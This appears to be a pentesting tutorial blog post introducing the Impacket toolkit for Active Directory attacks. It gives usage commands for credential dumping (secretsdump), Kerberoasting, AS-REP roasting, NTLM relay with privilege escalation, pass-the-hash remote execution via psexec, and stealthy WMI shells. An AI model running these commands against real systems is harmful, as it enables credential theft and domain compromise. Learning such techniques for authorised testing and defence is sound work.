Windows Exploitation 11.1

Impacket in Action

Introduction

In this blog post we will learn about Impacket library, and its usage during pentesting, we will also discuss some of the useful tools of this library. This post is for those who know the basics of Active Directory and Windows Administration Services. If you’re new, please do a google search if you feel uncomfortable.

Impacket

https://github.com/SecureAuthCorp/impacket.git

Clone the repo

git clone https://github.com/SecureAuthCorp/impacket.git

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

What protocols are featured?

• Ethernet, Linux “Cooked” capture.
• IP, TCP, UDP, ICMP, IGMP, ARP.
• IPv4 and IPv6 Support.
• NMB and SMB1, SMB2 and SMB3 (high-level implementations).
• MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS, and HTTP.
• Plain, NTLM, and Kerberos authentications, using password/hashes/tickets/keys.
• Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, BKRP, DHCPM, EVEN6, MGMT, SASEC, TSCH, DCOM, WMI.
• Portions of TDS (MSSQL) and LDAP protocol implementations.

pip install -r requirements.txt

python setup.py install

You can find any of the impacket tools in ‘/impacket/examples’ file.

Explanation

addcomputer.py: Allows to add a computer to a domain using LDAP or SAMR (SMB).

addcomputer.py -method SAMR -computer-pass <PASSWORD> -computer-name <NAME> DOMAIN/USER:PASSWORD

We have added a new computer using SAMR(Security Account Manager (SAM) Remote Protocol (Client-to-Server)) to a domain.

GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. The output is compatible with JtR and HashCat.

If we found any user accounts configured with the unconstrained delegation, we can obtain its Kerberos tickets and can try to crack that ticket.

GetUserSPNs.py DOMAIN/USER:PASSWORD -request-user <UNCONSTRAINED_USER>

GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). The output is compatible with JtR.

GetNPUsers.py DOMAIN/USER -dc-ip 10.10.10.161 (TargetIP)

secretdump.py Performs various techniques to dump secrets from the remote machine without executing any agent there.

secretsdump.py  DOMAIN/USER:PASSWORD@<VictimIP>

secretsdump Empire/locus:brokeme@198.162.0.1

lookupsid.py: It used to enumerate local and domain users in target windows machine.

lookupsid.py user:password@<targetip>

ntlmrelayx.py: This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy.

ntlmrelayx.py --escalate-user username -t ldap://DOMAIN_CONTROLLER

ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco

psexec.py: it is used to perform remote code execution, it executes processes on remote systems and redirects console applications’ output to the local system so that these applications appear to be running locally.

psexec.py -hashes <LM hash>  domain/user@<TargetIP> 

psexec.py -hashes :73ry4923rho24jr2jeor2po3j Empire/administrator@192.168.10.16 powershell.exe

smbexec.py: It focuses on using native windows functions/features for post-exploitation and expanding access on a network after you gain some credentials, whether that be a hash or password for a local or domain account. It’s similar to psexec.

smbexec.py Empire/administrator@192.168.10.16

You can also use hash.

wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.

wmiexec.py 'Empire/administrator@192.168.10.16'

smbserver.py: A Python implementation of an SMB server. Allows to quickly set up shares and user accounts.

smbserver.py temp /DIRECTORY/win_binaries

You have run smb server in your machine now you can share resources and also Windows utilities with the target system. To check the server

smbclient //yourIP/temp

On target system

\\10.10.14.6\temp\whoami.exe

Conclusion

We have discussed some tools with their basic usage that will help us in Exploitation and Post Exploitation phases, I recommend you to read resources I have given below

Some reference links :

https://www.secureauth.com/labs/open-source-tools/impacket

http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html

https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/